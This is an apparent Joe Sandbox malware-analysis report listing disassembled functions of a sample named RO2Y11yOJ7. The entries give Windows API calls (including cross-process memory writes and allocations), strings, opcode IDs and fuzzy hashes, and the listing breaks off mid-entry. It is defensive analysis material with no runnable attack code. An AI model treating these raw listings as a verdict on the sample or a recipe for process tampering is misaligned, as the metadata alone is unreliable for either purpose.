                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 882b421009e3ea67a737675ab5ed4c742bbd373cce3c935a65f1177b3401192d
                                                          • Instruction ID: e17eebe83f20ead258029c9d8a38169e223dc481976fea9e1f37ece55ae8cf04
                                                          • Opcode Fuzzy Hash: 882b421009e3ea67a737675ab5ed4c742bbd373cce3c935a65f1177b3401192d
                                                          • Instruction Fuzzy Hash: 7D016D75C02A1DDBCF129FA4E888AEEFB7DFB4A311F05045AE845F2580CB74655487A1
                                                          Function 00397432 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?,?,0039777D), ref: 0039744F
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 0039746A
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 00397478
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?), ref: 00397488
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 00397494
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 1ca06f4788235c48a8852f43f9d6172c705cb6f57c40417d2518b63e31c62ca8
                                                          • Instruction ID: c2e83047a0a307e5c23343fff3d2b0a46d7171e798f31ee52b2b443188533b04
                                                          • Opcode Fuzzy Hash: 1ca06f4788235c48a8852f43f9d6172c705cb6f57c40417d2518b63e31c62ca8
                                                          • Instruction Fuzzy Hash: 71017C76615308BFDB125F65DC44EAA7FBEEB44B62F144024FD08D2261E731ED419BA0
                                                          Function 003983D1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003983E8
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003983F2
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00398401
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00398408
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0039841E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: d7d15ca5b36222417ba6a43bf8b462638834c1046e458072353cafc882181cb3
                                                          • Instruction ID: d0c5be31585198d34430da7f51786ec8ae465147f3d8711c172ba37ca247d042
                                                          • Opcode Fuzzy Hash: d7d15ca5b36222417ba6a43bf8b462638834c1046e458072353cafc882181cb3
                                                          • Instruction Fuzzy Hash: 28F04935204215AFEB125FA6EC89E6B3BADFF8AB54F04042AF949C6150CA65AC41DB60
                                                          Function 00398432 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00398449
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00398453
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00398462
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00398469
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0039847F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 600764ac2f6f0cc5394f1faed5157ea3a9103a6fb602a7b5aa6feb589ded17cb
                                                          • Instruction ID: 51209e29303417dc88e076312760769fa57eac9f6e51173b80cd04d09e7e9978
                                                          • Opcode Fuzzy Hash: 600764ac2f6f0cc5394f1faed5157ea3a9103a6fb602a7b5aa6feb589ded17cb
                                                          • Instruction Fuzzy Hash: 68F04F35240215AFEB121FA6EC88E673FADFF8A754F080525F945C7150CA61A941DB60
                                                          Function 0039C4A5 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0039C4B9
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0039C4D0
                                                          • MessageBeep.USER32(00000000), ref: 0039C4E8
                                                          • KillTimer.USER32(?,0000040A), ref: 0039C504
                                                          • EndDialog.USER32(?,00000001), ref: 0039C51E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 638b63835457cc1cf471a5758db3f0924aad47b408055e756524ebfdb27f4dae
                                                          • Instruction ID: c3a3c9e66e4f7b6cf4cfc3a24776030853f04efc6fd149c73758c6a78e6a41ba
                                                          • Opcode Fuzzy Hash: 638b63835457cc1cf471a5758db3f0924aad47b408055e756524ebfdb27f4dae
                                                          • Instruction Fuzzy Hash: F2016D30510704ABEB22AB21DD4EFA677BDFF01709F014669E586E14E1DBF1B9588B90
                                                          Function 003413B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 003413BF
                                                          • StrokeAndFillPath.GDI32(?,?,0037BA08,00000000,?), ref: 003413DB
                                                          • SelectObject.GDI32(?,00000000), ref: 003413EE
                                                          • DeleteObject.GDI32 ref: 00341401
                                                          • StrokePath.GDI32(?), ref: 0034141C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: f6cdc51a23f07ec54f880bcfa7635a89300a0c475115341f62003844a15ece43
                                                          • Instruction ID: 9fa4076c9fb10f4e1b52a0d9d84e3cfff85b1172530a11dc5a91da709528c34b
                                                          • Opcode Fuzzy Hash: f6cdc51a23f07ec54f880bcfa7635a89300a0c475115341f62003844a15ece43
                                                          • Instruction Fuzzy Hash: CCF0FB31000B089FDB126F66ED4CB593BE9E700726F08C234E869981B1C73069A5DF14
                                                          Function 00352E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00360F36: std::exception::exception.LIBCMT ref: 00360F6C
                                                            • Part of subcall function 00360F36: __CxxThrowException@8.LIBCMT ref: 00360F81
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 00347BB1: _memmove.LIBCMT ref: 00347C0B
                                                          • __swprintf.LIBCMT ref: 0035302D
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00352EC6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: e27bd9618c0734f8cff7b7b47803e7b1b584e397ee0391e498ddcfda0fb496f6
                                                          • Instruction ID: 93ba3cd1a0151c94afbb0abb0d2e9b01b8ce330d157160553e759fb55c8dc0f1
                                                          • Opcode Fuzzy Hash: e27bd9618c0734f8cff7b7b47803e7b1b584e397ee0391e498ddcfda0fb496f6
                                                          • Instruction Fuzzy Hash: 3C9138715087019FC71AEF24D896C6BB7E8EF85750F00495DF8869F2A1DB60EE48CB92
                                                          Function 003AB9C7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                          • CoInitialize.OLE32(00000000), ref: 003ABA47
                                                          • CoCreateInstance.OLE32(003D2D6C,00000000,00000001,003D2BDC,?), ref: 003ABA60
                                                          • CoUninitialize.OLE32 ref: 003ABA7D
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: 7ad934f89422752de31362606140d731e29982459bc436f888b74a922e4c41f4
                                                          • Instruction ID: b1f1059dd6f5c095cdc15e4d409874bbdf6374b22f53bf1dab41e943f12b2157
                                                          • Opcode Fuzzy Hash: 7ad934f89422752de31362606140d731e29982459bc436f888b74a922e4c41f4
                                                          • Instruction Fuzzy Hash: F2A155756043059FCB12DF14C484E6ABBE9FF89314F058989F89A9B3A2CB31EC45CB91
                                                          Function 0039B5B5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0039B780
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container$%=
                                                          • API String ID: 3565006973-2852750407
                                                          • Opcode ID: c81436194c7dd26a67b0b8d94734fa1e1b508223bc3256acab894e6873dbd042
                                                          • Instruction ID: 0733acfbcdc5a23a45386465e41dcdbef21f0414dc4d1de779aec3a0bb801e89
                                                          • Opcode Fuzzy Hash: c81436194c7dd26a67b0b8d94734fa1e1b508223bc3256acab894e6873dbd042
                                                          • Instruction Fuzzy Hash: AD914870604201AFDB15DF68D984B6ABBF8FF48710F10856EF94ACB691DBB0E840CB60
                                                          Function 0036518D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 0036521D
                                                            • Part of subcall function 00370270: __87except.LIBCMT ref: 003702AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: e5323a354514682597791a64e49e7479b3c9aeb7976547c4f8426d5b58e8c792
                                                          • Instruction ID: ac95fb5fbccb730caef7564fc04169dd018eecfb366df162b79978a90ad40463
                                                          • Opcode Fuzzy Hash: e5323a354514682597791a64e49e7479b3c9aeb7976547c4f8426d5b58e8c792
                                                          • Instruction Fuzzy Hash: 8B518C65A0DA01D7EB3B7B14C95137E3B98DB00710F25CD79E0D9862ADEF398CC49A46
                                                          Function 0036017B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$+
                                                          • API String ID: 0-2552117581
                                                          • Opcode ID: 34ea79caae43ef895c1b4712ec8fc851b6e4eeff258c798289b4e7c3c16bc7a6
                                                          • Instruction ID: 73ff9ec61c05c8b5378ebaf4269d841f71b4b387554ad8a304877bcc0e3313e4
                                                          • Opcode Fuzzy Hash: 34ea79caae43ef895c1b4712ec8fc851b6e4eeff258c798289b4e7c3c16bc7a6
                                                          • Instruction Fuzzy Hash: C15120755052469FCF2BDF68C49AAFA7BB4EF19320F158055FC919B2A0D730AC82CB60
                                                          Function 00353297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_free
                                                          • String ID: Oa5
                                                          • API String ID: 2620147621-2933034282
                                                          • Opcode ID: 8039d84a7e2cd2af670afd600b6ff346a6c1a3d0a9e95f2923a603bd90603d0a
                                                          • Instruction ID: 3f7f7618b9b94462f9866fb12f1c7fd26942e7529ada96d641331013b2077f95
                                                          • Opcode Fuzzy Hash: 8039d84a7e2cd2af670afd600b6ff346a6c1a3d0a9e95f2923a603bd90603d0a
                                                          • Instruction Fuzzy Hash: 4F517E716083419FDB2ACF28C481B2BBBE5FF85355F55892DE9898B360E731D905CB42
                                                          Function 003562F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: ERCP
                                                          • API String ID: 2532777613-1384759551
                                                          • Opcode ID: 6a9a553ced58ff180a007a0f2d34eef849cda6518c68595363acd3c30fc46a80
                                                          • Instruction ID: 0f0c02b9af60af8a14c833fef1989800864b8ede623b866d3478db6afe49c310
                                                          • Opcode Fuzzy Hash: 6a9a553ced58ff180a007a0f2d34eef849cda6518c68595363acd3c30fc46a80
                                                          • Instruction Fuzzy Hash: 8151E7B1900309DBCB26CF55C842BAAB7F4FF04315F21856EE94ADB261E771A984CB40
                                                          Function 00399AB7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003A17ED: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00399558,?,?,00000034,00000800,?,00000034), ref: 003A1817
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00399B01
                                                            • Part of subcall function 003A17B8: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00399587,?,?,00000800,?,00001073,00000000,?,?), ref: 003A17E2
                                                            • Part of subcall function 003A170F: GetWindowThreadProcessId.USER32(?,?), ref: 003A173A
                                                            • Part of subcall function 003A170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0039951C,00000034,?,?,00001004,00000000,00000000), ref: 003A174A
                                                            • Part of subcall function 003A170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0039951C,00000034,?,?,00001004,00000000,00000000), ref: 003A1760
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00399B6E
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00399BBB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: 92be032ddf72f5c1012479c53a311aef82a0c2e5f9fecc77a410a95cf48b06fb
                                                          • Instruction ID: 32d8d2a32248545e5d7c384ebc93724703fbb8843ede0dacfdb718c6b51fa98b
                                                          • Opcode Fuzzy Hash: 92be032ddf72f5c1012479c53a311aef82a0c2e5f9fecc77a410a95cf48b06fb
                                                          • Instruction Fuzzy Hash: E7414C76900218AFDF11EFA4CD85FDEBBB8EB09700F104099FA55BB190DA716E45CB61
                                                          Function 003C7978 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003CF910,00000000,?,?,?,?), ref: 003C7A11
                                                          • GetWindowLongW.USER32 ref: 003C7A2E
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C7A3E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 7fcfb97881715836aa9f2fc8bb99ec726c1220d9151347c0f961fbc26f6c6b08
                                                          • Instruction ID: 964347ef70af30a3bc26efadb901c5a905a687b541dc3518d75065cbe261eb31
                                                          • Opcode Fuzzy Hash: 7fcfb97881715836aa9f2fc8bb99ec726c1220d9151347c0f961fbc26f6c6b08
                                                          • Instruction Fuzzy Hash: 2E319A31204606AFDB129E38CC41FEA7BA9EB09324F214729F875E62E0C731ED519B50
                                                          Function 003C740B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003C7493
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003C74A7
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C74CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
